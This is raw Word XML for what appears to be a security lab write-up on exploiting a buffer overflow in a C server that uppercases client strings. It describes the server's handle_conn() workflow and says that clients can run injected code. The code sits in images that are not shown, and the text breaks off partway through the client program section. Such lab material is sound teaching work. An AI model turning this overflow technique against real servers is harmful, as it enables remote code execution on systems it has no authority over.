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C2FB" w14:textId="77777777" w:rsidR="006E4A47" w:rsidRDefault="006E4A47" w:rsidP="006E4A47">
      <w:r>
        <w:t xml:space="preserve">Buffer Overflow on a Server Program </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F6B13" w14:textId="3F97647D" w:rsidR="006E4A47" w:rsidRDefault="006E4A47" w:rsidP="006E4A47">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B9DF4" w14:textId="0FFFD6A3" w:rsidR="006E4A47" w:rsidRDefault="0069282B" w:rsidP="006E4A47">
      <w:r>
        <w:t>This experiment</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> a server program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t>convert</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> all characters of a string, supplied by clients, into uppercase. Once the vulnerability is exploited, a client </w:t>
      </w:r>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> execute a segment </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> malicious code hidden in the data that is sent to the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC7829E" w14:textId="77777777" w:rsidR="006E4A47" w:rsidRDefault="006E4A47" w:rsidP="006E4A47">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EAAD3B" w14:textId="00331CFF" w:rsidR="006E4A47" w:rsidRDefault="00931612" w:rsidP="006E4A47">
      <w:r>
        <w:t>In this document, the</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> server program is first introduced. </w:t>
      </w:r>
      <w:r>
        <w:t>Its</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is then discussed</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve">. At last, </w:t>
      </w:r>
      <w:r>
        <w:t>the vulnerability is</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve"> and implement</w:t>
      </w:r>
      <w:r>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="006E4A47">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE0DF7" w14:textId="77777777" w:rsidR="006E4A47" w:rsidRDefault="006E4A47" w:rsidP="006E4A47"/>
    <w:p w14:paraId="2475503A" w14:textId="15AEC39B" w:rsidR="00784A8A" w:rsidRDefault="006E4A47" w:rsidP="002808A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E4A47">
        <w:t>Server program (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00764443">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>server.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E4A47">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB8950" w14:textId="5E776A23" w:rsidR="002808A1" w:rsidRDefault="00C573CE" w:rsidP="002808A1">
      <w:commentRangeStart w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6242A4D9" wp14:editId="716EC8D9">
            <wp:extent cx="5943600" cy="3348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8355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:commentRangeEnd w:id="0"/>
      <w:r w:rsidR="00F41116">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="0"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="262FAEA3" w14:textId="37E10885" w:rsidR="0040431C" w:rsidRDefault="00FC68F8" w:rsidP="002808A1">
      <w:r w:rsidRPr="00FC68F8">
        <w:t>In this program,</w:t>
      </w:r>
      <w:r w:rsidR="001A6488">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC68F8">
        <w:t xml:space="preserve"> main function is used to setup a socket for communication, to construct connection with clients and to start function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC68F8">
        <w:t>handle_conn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC68F8">
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF8970F" w14:textId="157E5D5B" w:rsidR="0040431C" w:rsidRDefault="0040431C" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55DBF4E7" wp14:editId="54D24246">
            <wp:extent cx="2423160" cy="11145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656" cy="1130376"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD032F1" w14:textId="0A0105CC" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="002808A1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC68F8">
        <w:t>proc_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC68F8">
        <w:t>() is a simple function to convert the characters of the string received into uppercases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64180184" w14:textId="2A964552" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="00FC68F8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The most important part of this program is function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00764443">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>handle_conn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00764443">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>handle_conn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() is used to handle the connection between a client and the server – to receive data from the client and to send the response to the client. The workflow of this function </w:t>
      </w:r>
      <w:r w:rsidR="002F6943">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as follows. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FB8F3F" w14:textId="61EE2CFC" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="00FC68F8">
      <w:r>
        <w:t xml:space="preserve"> 1. Read the length of the string from network into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB1E03">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.nbytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792178A6" w14:textId="77777777" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="00FC68F8">
      <w:r>
        <w:t xml:space="preserve">2. Send “Okay” to the client. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C980C49" w14:textId="77777777" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="00FC68F8">
      <w:r>
        <w:t xml:space="preserve">3. Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00486721">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>mmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00486721">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>() to allocate storage for the string to be received</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B85289" w14:textId="77777777" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="00FC68F8">
      <w:r>
        <w:t xml:space="preserve">4. Read the string from network into </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB1E03">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322B3519" w14:textId="77777777" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="00FC68F8">
      <w:r>
        <w:t xml:space="preserve">5. Call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proc_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() to convert the characters of the string into uppercase. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61108EE9" w14:textId="75434E99" w:rsidR="00FC68F8" w:rsidRDefault="00FC68F8" w:rsidP="00FC68F8">
      <w:r>
        <w:t xml:space="preserve">6. Send </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB1E03">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>the converted string (in p)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> back to the client. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D57D335" w14:textId="17D8DAA0" w:rsidR="0040431C" w:rsidRDefault="007D0A09" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7547F0C2" wp14:editId="48C52F09">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1812330</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>950450</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="660240" cy="294840"/>
                <wp:effectExtent l="57150" t="38100" r="26035" b="4826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660240" cy="294840"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="3EF6FB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2pt;margin-top:74.15pt;width:53.45pt;height:2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">
                <v:imagedata r:id="rId12" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:commentRangeStart w:id="1"/>
      <w:r w:rsidR="0040431C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F13581" wp14:editId="3A32E7F5">
            <wp:extent cx="5900762" cy="4415397"/>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9586" cy="4429483"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="00E447C5">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D6B988" w14:textId="77777777" w:rsidR="00294725" w:rsidRDefault="00294725" w:rsidP="007D23B3"/>
    <w:p w14:paraId="109D8A8E" w14:textId="23985280" w:rsidR="007D23B3" w:rsidRDefault="007D23B3" w:rsidP="007D23B3">
      <w:r>
        <w:t>2. Normal Client Program (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00764443">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>client.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076ABEC" w14:textId="47B78B27" w:rsidR="007D23B3" w:rsidRDefault="007D23B3" w:rsidP="007D23B3">
      <w:r>
        <w:t xml:space="preserve"> This program is a typical client program interacting with a server.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171F70D1" w14:textId="30457F93" w:rsidR="0040431C" w:rsidRDefault="0040431C" w:rsidP="002808A1"/>
    <w:p w14:paraId="753BEEBC" w14:textId="184C7FB3" w:rsidR="0040431C" w:rsidRDefault="00B6302C" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251751424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49CBA992" wp14:editId="187FA99F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4030500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>906450</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="25200" cy="16200"/>
                <wp:effectExtent l="38100" t="38100" r="51435" b="41275"/>
                <wp:wrapNone/>
                <wp:docPr id="53" name="Ink 53"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId14">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="25200" cy="16200"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="1552D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316.65pt;margin-top:70.65pt;width:3.4pt;height:2.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">
                <v:imagedata r:id="rId15" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251750400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21E240D9" wp14:editId="0326EC85">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3961740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1001850</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="11880" cy="360"/>
                <wp:effectExtent l="57150" t="38100" r="45720" b="57150"/>
                <wp:wrapNone/>
                <wp:docPr id="43" name="Ink 43"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId16">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="11880" cy="360"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0F5E63E4" id="Ink 43" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:311.25pt;margin-top:78.2pt;width:2.3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">
                <v:imagedata r:id="rId17" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251749376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AD7259E" wp14:editId="7C53420F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4425060</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>917250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="48960" cy="126000"/>
                <wp:effectExtent l="57150" t="38100" r="46355" b="45720"/>
                <wp:wrapNone/>
                <wp:docPr id="41" name="Ink 41"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId18">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="48960" cy="126000"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2D539005" id="Ink 41" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:347.75pt;margin-top:71.5pt;width:5.25pt;height:11.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">
                <v:imagedata r:id="rId19" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251748352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5F6E903F" wp14:editId="7F6DC388">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4281805</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>906145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="120870" cy="111125"/>
                <wp:effectExtent l="57150" t="38100" r="0" b="41275"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="Ink 40"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId20">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="120870" cy="111125"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4C930E31" id="Ink 40" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:336.45pt;margin-top:70.65pt;width:10.9pt;height:10.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">
                <v:imagedata r:id="rId21" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="541B369E" wp14:editId="454FC8B9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4215900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>925530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="36360" cy="104760"/>
                <wp:effectExtent l="38100" t="38100" r="40005" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="Ink 35"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId22">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="36360" cy="104760"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5D2435BE" id="Ink 35" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:331.25pt;margin-top:72.2pt;width:4.25pt;height:9.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">
                <v:imagedata r:id="rId23" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11BC691E" wp14:editId="6664025B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4209420</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>929490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="18000" cy="58680"/>
                <wp:effectExtent l="38100" t="38100" r="58420" b="55880"/>
                <wp:wrapNone/>
                <wp:docPr id="34" name="Ink 34"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId24">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="18000" cy="58680"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1F39494C" id="Ink 34" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:330.75pt;margin-top:72.5pt;width:2.8pt;height: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">
                <v:imagedata r:id="rId25" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251741184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D68A07C" wp14:editId="70767DB8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4144980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>948210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="43200" cy="74160"/>
                <wp:effectExtent l="57150" t="38100" r="52070" b="40640"/>
                <wp:wrapNone/>
                <wp:docPr id="33" name="Ink 33"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId26">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="43200" cy="74160"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="672D8FD7" id="Ink 33" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:325.7pt;margin-top:73.95pt;width:4.8pt;height:7.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">
                <v:imagedata r:id="rId27" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251740160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28E80777" wp14:editId="7B11F466">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4100340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>818970</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="49320" cy="214560"/>
                <wp:effectExtent l="57150" t="38100" r="46355" b="52705"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="Ink 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId28">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="49320" cy="214560"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="10F6E1D4" id="Ink 32" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:322.15pt;margin-top:63.8pt;width:5.3pt;height:18.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">
                <v:imagedata r:id="rId29" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B2FE1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1022D4F3" wp14:editId="72736ACD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4053540</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>914370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="41400" cy="69840"/>
                <wp:effectExtent l="57150" t="38100" r="53975" b="45085"/>
                <wp:wrapNone/>
                <wp:docPr id="31" name="Ink 31"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId30">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="41400" cy="69840"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
